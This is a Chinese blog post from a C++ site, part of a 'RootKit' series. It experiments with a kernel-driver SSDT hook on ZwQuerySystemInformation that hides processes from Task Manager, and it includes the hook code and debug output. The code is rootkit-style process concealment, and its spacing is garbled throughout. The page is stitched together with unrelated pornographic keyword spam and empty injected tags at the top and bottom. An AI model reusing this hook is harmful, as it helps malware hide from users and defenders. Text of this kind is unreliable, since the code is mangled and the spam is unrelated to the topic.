青青草原综合久久大伊人导航_色综合久久天天综合_日日噜噜夜夜狠狠久久丁香五月_热久久这里只有精品

S.l.e!ep.¢%

像打了激速一樣,以四倍的速度運轉,開心的工作
簡單、開放、平等的公司文化;尊重個性、自由與個人價值;
posts - 1098, comments - 335, trackbacks - 0, articles - 1
  C++博客 :: 首頁 :: 新隨筆 :: 聯系 :: 聚合  :: 管理

HOOK SSDT Hide Process (八)

Posted on 2009-10-28 14:38 S.l.e!ep.¢% 閱讀(346) 評論(0)  編輯 收藏 引用 所屬分類: RootKit
HOOK SSDT Hide Process (七)

HOOK SSDT Hide Process (七)? 的代碼雖然隱藏了進程,但會導致在 taskmgr.exe 全部進程看不到
而且運行一段時間后, taskmgr.exe 就會非法關閉

Q:
今天突然發現,如果 taskmgr.exe 中選中了 'Show processes from all users' 選項,還是可以看到其它進程的(taskmgr.exe成功隱藏),但為什么不選中就所以進程看不到?這么鬼異的問題估計要OD下 taskmgr.exe 才知道

為了一查究竟,我把 MyZwQuerySystemInformation 修改成如下的代碼
NTSTATUS?MyZwQuerySystemInformation(IN?ULONG?SystemInformationClass,?
????????????????????????IN?PVOID?SystemInformation,?
????????????????????IN?ULONG?SystemInformationLength,?
????????????????????OUT?PULONG?ReturnLength)?
//定義自己的Hook函數
{?
????
????NTSTATUS?rc;?
????UNICODE_STRING?process_name;
????
????RtlInitUnicodeString(
&process_name,?L"taskmgr.exe");
????
????rc?
=?(OldZwQuerySystemInformation)?(?
????????SystemInformationClass,?
????????SystemInformation,?
????????SystemInformationLength,?
????????ReturnLength);?
????
????
if(NT_SUCCESS(rc))?
????{
????????
????????
if(5?==?SystemInformationClass)
????????{?
????????????
????????????
struct?_SYSTEM_PROCESSES?*curr?=?(struct?_SYSTEM_PROCESSES?*)SystemInformation;?
????????????
struct?_SYSTEM_PROCESSES?*prev?=?NULL;?
????????????
????????????
//if(curr->NextEntryDelta)
????????????
//????curr?=?(_SYSTEM_PROCESSES?*)((ULONG)curr?+?curr->NextEntryDelta);?
????????????
????????????
while(curr)
????????????{
????????????????????????????????KdPrint((
"ProcessName:%wZ?NextEntryDelta:%d?\n",?&curr->ProcessName,?curr->NextEntryDelta));
????????
????????????????
if(curr->NextEntryDelta)
????????????????????curr?
=?(_SYSTEM_PROCESSES?*)((ULONG)curr?+?curr->NextEntryDelta);
????????????????
else
????????????????????curr?
=?NULL;
????????????????????
????????????????
????????????}
//?while(curr)?
????????????????????????
????????????????????????????????UnHook();????????????

????????}
//?if(5?==?SystemInformationClass)
????????
????}
//?if(NT_SUCCESS(rc))
????


????
//?KdPrint(("HookZwQuerySystemInformation?is?Succeessfully.?\n"));
????return?rc;
}

在 DebugView 中顯示的內容如下:
Entry?Hook?Function!
Entry?Hook()
KeServiceDescriptorTable
->ServiceTableBase?is?:0x804e2d20
OldZwQuerySystemInformation?
is?:0x8057cc27
MyZwQuerySystemInformation?
is?:0xf8f0c080
Leave?DriverEntry
!
ProcessName:(
null)?NextEntryDelta:248?
ProcessName:System?NextEntryDelta:
3528?
ProcessName:smss.exe?NextEntryDelta:
400?
ProcessName:csrss.exe?NextEntryDelta:
912?
ProcessName:winlogon.exe?NextEntryDelta:
1304?
ProcessName:services.exe?NextEntryDelta:
1176?
ProcessName:lsass.exe?NextEntryDelta:
1360?
ProcessName:vmacthlp.exe?NextEntryDelta:
280?
ProcessName:svchost.exe?NextEntryDelta:
1360?
ProcessName:svchost.exe?NextEntryDelta:
656?
ProcessName:svchost.exe?NextEntryDelta:
3664?
ProcessName:svchost.exe?NextEntryDelta:
464?
ProcessName:svchost.exe?NextEntryDelta:
1104?
ProcessName:explorer.exe?NextEntryDelta:
920?
ProcessName:spoolsv.exe?NextEntryDelta:
848?
ProcessName:VMwareService.exe?NextEntryDelta:
416?
ProcessName:VMwareTray.exe?NextEntryDelta:
280?
ProcessName:VMwareUser.exe?NextEntryDelta:
536?
ProcessName:ctfmon.exe?NextEntryDelta:
272?
ProcessName:wscntfy.exe?NextEntryDelta:
272?
ProcessName:alg.exe?NextEntryDelta:
584?
ProcessName:cmd.exe?NextEntryDelta:
264?
ProcessName:conime.exe?NextEntryDelta:
272?
ProcessName:DriverMonitor.exe?NextEntryDelta:
608?
ProcessName:notepad.exe?NextEntryDelta:
272?
ProcessName:taskmgr.exe?NextEntryDelta:
400?
ProcessName:Dbgview.exe?NextEntryDelta:
0?
Unhook?leave
!

接著再做一個嘗試,如果直接把第二個線程的信息的 NextEntryDelta 改為0 , 是不是 taskmgr.exe 就會只顯示一條線程?
NTSTATUS?MyZwQuerySystemInformation(IN?ULONG?SystemInformationClass,?
????????????????????????IN?PVOID?SystemInformation,?
????????????????????IN?ULONG?SystemInformationLength,?
????????????????????OUT?PULONG?ReturnLength)?
//定義自己的Hook函數
{?
????
????NTSTATUS?rc;?
????UNICODE_STRING?process_name;
????
????RtlInitUnicodeString(
&process_name,?L"taskmgr.exe");
????
????rc?
=?(OldZwQuerySystemInformation)?(?
????????SystemInformationClass,?
????????SystemInformation,?
????????SystemInformationLength,?
????????ReturnLength);?
????
????
if(NT_SUCCESS(rc))?
????{
????????
????????
if(5?==?SystemInformationClass)
????????{?
????????????
????????????
struct?_SYSTEM_PROCESSES?*curr?=?(struct?_SYSTEM_PROCESSES?*)SystemInformation;?
????????????
struct?_SYSTEM_PROCESSES?*prev?=?NULL;?
????????????
????????????
if(curr->NextEntryDelta)
????????????????????????{
??????????????????????????curr->NextEntryDelta?=?0;
????????????}
????????????????????????
????????????????????????
//????curr?=?(_SYSTEM_PROCESSES?*)((ULONG)curr?+?curr->NextEntryDelta);?
????????????
????????????????????????
/*
????????????while(curr)
????????????{
????????????????????????????????KdPrint(("ProcessName:%wZ?NextEntryDelta:%d?\n",?&curr->ProcessName,?curr->NextEntryDelta));
????????
????????????????if(curr->NextEntryDelta)
????????????????????curr?=?(_SYSTEM_PROCESSES?*)((ULONG)curr?+?curr->NextEntryDelta);
????????????????else
????????????????????curr?=?NULL;
????????????????????
????????????????
????????????}//?while(curr)?
????????????????
*/????????
?????????????????
//???????????????UnHook();????????????

????????}
//?if(5?==?SystemInformationClass)
????????
????}
//?if(NT_SUCCESS(rc))
????


????
//?KdPrint(("HookZwQuerySystemInformation?is?Succeessfully.?\n"));
????return?rc;
}


情況還是?taskmgr.exe 中選中了 'Show processes from all users' 選項,就會顯示一條 System Idle Process 線程,如果不選中
'Show processes from all users' 這個選項,那么 Taskmgr.exe 的列表就會顯示為空

curr->NextEntryDelta?=?0; 那為何不把 curr 之后的數全部置為 0x00 ?
于是,加多幾句代碼

??????????????if(curr->NextEntryDelta)
????????????{
??????????????????????????KdPrint((
"SystemInformationLength:%d?\n",?SystemInformationLength));
??????????????????????????curr->NextEntryDelta?=?0;
??????????????????????????memset((
void*)((ULONG)curr?+?curr->NextEntryDelta),?0x00,?SystemInformationLength?-?curr->NextEntryDelta);
????????????}

此時,無論有無選中 'Show Process From all users'選項,所有進程都不顯示在 taskmgr.exe 了
另外還發現兩個現象
Q1. taskmgr.exe 調用 ZwQuerySystemInformation 時,ReturnLength?指針總是傳 NULL
Q2. taskmgr.exe 調用 ZwQuerySystemInformation 時,SystemInformationLength 總是傳 0x6000
難道 taskmgr.exe 并不是通過 NextEntryData 這個值來定位到下個進程的信息的?

?

青青草原综合久久大伊人导航_色综合久久天天综合_日日噜噜夜夜狠狠久久丁香五月_热久久这里只有精品
  • <ins id="pjuwb"></ins>
    <blockquote id="pjuwb"><pre id="pjuwb"></pre></blockquote>
    <noscript id="pjuwb"></noscript>
          <sup id="pjuwb"><pre id="pjuwb"></pre></sup>
            <dd id="pjuwb"></dd>
            <abbr id="pjuwb"></abbr>
            亚洲人精品午夜| 欧美日韩hd| 亚洲高清不卡一区| 性欧美暴力猛交69hd| 亚洲图片欧美一区| 亚洲一级电影| 亚洲欧美日韩一区在线| 欧美在线关看| 麻豆av一区二区三区久久| 欧美mv日韩mv国产网站app| 欧美华人在线视频| 99re热这里只有精品视频| 亚洲午夜视频| 久久国产精品网站| 欧美精品v日韩精品v韩国精品v| 欧美激情91| 国产精品国产三级国产普通话99| 国产精品视频福利| 在线免费观看一区二区三区| 日韩亚洲欧美成人一区| 亚洲欧美一区二区三区久久| 久久久久国产精品厨房| 亚洲第一页在线| 一区二区三区产品免费精品久久75 | 国内成人精品2018免费看 | 亚洲欧美日韩国产精品| 久久精品色图| 亚洲人成人一区二区在线观看| 亚洲无人区一区| 蜜桃伊人久久| 国产亚洲视频在线观看| 在线亚洲精品| 欧美国产欧美亚洲国产日韩mv天天看完整 | 久久精选视频| 欧美精品在线视频| 国户精品久久久久久久久久久不卡| 亚洲人成在线影院| 久久先锋影音av| 在线亚洲观看| 欧美国产高清| 亚洲福利一区| 久久久久久网址| 亚洲视屏在线播放| 欧美大尺度在线| 在线观看国产精品淫| 欧美在线视频日韩| 99国产精品| 欧美激情精品| 亚洲激情视频网站| 蜜桃av一区二区在线观看| 欧美一乱一性一交一视频| 国产精品久久久久国产精品日日| 亚洲日本欧美天堂| 欧美黄在线观看| 久久亚洲不卡| 亚洲第一精品夜夜躁人人爽| 久久综合一区二区| 久久久国产精品一区| 国产亚洲毛片| 久久麻豆一区二区| 久久国产福利国产秒拍| 国内精品模特av私拍在线观看| 欧美在线免费观看| 亚洲欧美日韩一区二区| 国产日韩在线看片| 久久久久国产精品午夜一区| 欧美一区二区三区男人的天堂| 国产日韩欧美中文| 久久久久久久久久久一区| 新片速递亚洲合集欧美合集| 国产婷婷色一区二区三区在线| 久久精品国产精品| 久久久久久久综合狠狠综合| 1000部国产精品成人观看| 欧美国产激情| 欧美日韩精品免费在线观看视频| 99热这里只有成人精品国产| 一个色综合导航| 国产欧美一区二区三区国产幕精品| 亚洲欧美日韩国产一区二区三区 | 欧美成人69| 99热在线精品观看| 亚洲视频二区| 狠狠狠色丁香婷婷综合激情| 麻豆久久久9性大片| 欧美二区在线看| 中文欧美在线视频| 欧美亚洲综合另类| 欧美成人精品激情在线观看| 亚洲久久视频| 亚洲一区影音先锋| 激情六月婷婷综合| 亚洲欧洲偷拍精品| 国产麻豆日韩| 欧美成人一区二区三区在线观看| 欧美激情视频网站| 午夜日韩在线| 欧美成人精品福利| 午夜精品网站| 你懂的国产精品永久在线| 亚洲综合久久久久| 老司机精品导航| 午夜久久tv| 女人色偷偷aa久久天堂| 欧美一区二区三区另类| 免费成人美女女| 久久av红桃一区二区小说| 欧美成人午夜视频| 久久国产天堂福利天堂| 欧美高清日韩| 久久久久久黄| 国产精品每日更新| 亚洲黄色视屏| 一区久久精品| 欧美一级片久久久久久久| 夜夜嗨av一区二区三区四季av| 欧美一区二区三区四区高清 | 久久精品国产免费| 欧美激情一区二区三区成人| 久久精品视频一| 欧美午夜不卡视频| 亚洲国产老妈| 亚洲大黄网站| 欧美一区二区| 中日韩美女免费视频网址在线观看| 久久精品一区中文字幕| 欧美一级淫片播放口| 欧美视频一区二区三区四区| 亚洲电影自拍| 最新国产成人av网站网址麻豆 | 欧美高清视频| 在线观看亚洲精品| 久久久福利视频| 久久久www成人免费精品| 国产精品色婷婷| 一区二区三区回区在观看免费视频| 一本久道久久久| 欧美3dxxxxhd| 亚洲电影免费观看高清完整版在线| 一区视频在线看| 久久夜色撩人精品| 欧美激情视频一区二区三区不卡| 在线日韩av片| 久久一区免费| 欧美成人免费小视频| 亚洲国产精品久久久久秋霞蜜臀| 久久久久久网| 欧美激情第一页xxx| 亚洲精品久久久久| 欧美欧美在线| 亚洲乱码国产乱码精品精可以看| 国产精品久久久免费| 亚洲视频在线观看免费| 亚洲欧美日韩国产综合精品二区| 国产精品入口日韩视频大尺度| 亚洲一区精品电影| 久久免费视频网| 影音先锋中文字幕一区二区| 久久综合九色综合欧美就去吻| 欧美夫妇交换俱乐部在线观看| 日韩视频不卡中文| 欧美系列精品| 欧美中在线观看| 欧美成人精品不卡视频在线观看| 亚洲精品色图| 欧美三级在线视频| 久久国产精品99久久久久久老狼 | 亚洲视频第一页| 亚洲欧美综合国产精品一区| 国产一区在线播放| 欧美成人一品| 亚洲综合欧美| 免费在线观看精品| 亚洲一区二区免费| 怡红院精品视频在线观看极品| 欧美电影美腿模特1979在线看| 日韩天堂av| 久久午夜视频| 中文亚洲欧美| 黄色av日韩| 欧美视频一区二区三区四区 | 欧美三区视频| 久久精品视频在线| 亚洲免费观看在线观看| 久久人人九九| 亚洲在线网站| 亚洲精品乱码久久久久久黑人| 国产精品影音先锋| 欧美久久精品午夜青青大伊人| 午夜日本精品| av成人手机在线| 亚洲高清中文字幕| 久久久久国产一区二区| 亚洲与欧洲av电影| 亚洲精品乱码久久久久久黑人| 国产视频一区在线| 国产精品久久中文| 欧美午夜精品久久久久久久| 欧美bbbxxxxx| 久久久久久穴|